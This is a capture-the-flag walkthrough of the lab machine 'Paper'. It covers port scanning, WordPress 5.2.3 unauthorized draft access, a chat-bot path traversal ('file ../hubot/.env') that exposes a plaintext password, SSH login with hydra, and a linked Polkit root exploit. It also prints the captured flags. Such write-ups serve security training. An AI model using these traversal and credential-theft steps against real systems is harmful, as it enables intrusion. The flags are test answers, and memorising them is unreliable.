Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.11.143 | TCP:22,80,443 |
$ ip='10.10.11.143'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 2048 1005ea5056a600cb1c9c93df5f83e064 (RSA)
| 256 588c821cc6632a83875c2f2b4f4dc379 (ECDSA)
|_ 256 3178afd13bc42e9d604eeb5d03eca022 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: Blunder Tiffin Inc. – The best paper company in the elec...
|_http-generator: WordPress 5.2.3
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after: 2022-07-08T10:32:34
| http-methods:
|_ Potentially risky methods: TRACE
|_ssl-date: TLS randomness does not represent time
|_http-title: HTTP Server Test Page powered by CentOS
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
WordPress 5.2.3 unauthorized access
http://10.10.11.143/
![[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图](https://img.4awl.net/img/67/d691f55065db8cf0a1b560a214d5c5.jpg "[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图")
$ whatweb http://10.10.11.143/ -v
![[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图1](https://img.4awl.net/img/ad/071de827326eec279a8cfabd999992.jpg "[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图1")
# echo '10.10.11.143 office.paper'>>/etc/hosts
http://office.paper/
![[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图2](https://img.4awl.net/img/48/21d7356080ee8b71cad14346115126.jpg "[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图2")
![[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图3](https://img.4awl.net/img/6e/3106d0c807146d15e5330b79f21c07.jpg "[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图3")
$ feroxbuster -u 'http://office.paper/'
![[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图4](https://img.4awl.net/img/d3/b4cd650dc9a726cbe7d08cb1b8feb3.jpg "[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图4")
$ wpscan --url 'http://office.paper/'
![[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图5](https://img.4awl.net/img/de/4f2a59988596174018c67fe0dd097e.jpg "[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图5")
https://wpscan.com/vulnerability/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2
http://office.paper/?static=1
![[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图6](https://img.4awl.net/img/fd/224133c74d4ed7cdd1eea4657d9533.jpg "[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图6")
# echo '10.10.11.143 chat.office.paper'>>/etc/hosts
![[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图7](https://img.4awl.net/img/22/e66645a28d670e04406fa8857f4ef1.jpg "[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图7")
hubot-rocketchat LFI
https://github.com/RocketChat/hubot-rocketchat
list .
![[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图8](https://img.4awl.net/img/81/da9ba8c11f3b958b7f2524092d8eef.jpg "[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图8")
list ../
![[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图9](https://img.4awl.net/img/44/5b747c8bca205bab190acf8267bd1b.jpg "[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图9")
file ../hubot/.env
![[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图10](https://img.4awl.net/img/9c/5cfc311e1564e56896c5d57b04a641.jpg "[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图10")
username:recyclopspassword:Queenofblad3s!23
$ hydra -L user -p 'Queenofblad3s!23' ssh://10.10.11.143
![[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图11](https://img.4awl.net/img/80/13d78783a6572c7acc68ce266f2457.jpg "[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图11")
![[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图12](https://img.4awl.net/img/ce/9360454d3220c3fd43945865501d3e.jpg "[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图12")
User.txt
5f02c513c06b2e212e3433c1a09e5103
Privilege Escalation:Polkit
https://github.com/Almorabea/Polkit-exploit
![[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图13](https://img.4awl.net/img/49/cb664874bde9eb55837e8e16eb90f2.jpg "[Meachines] [Easy] Paper WordPress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限…插图13")
Root.txt
97ae0f9636f32f353b018406349c97ad
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
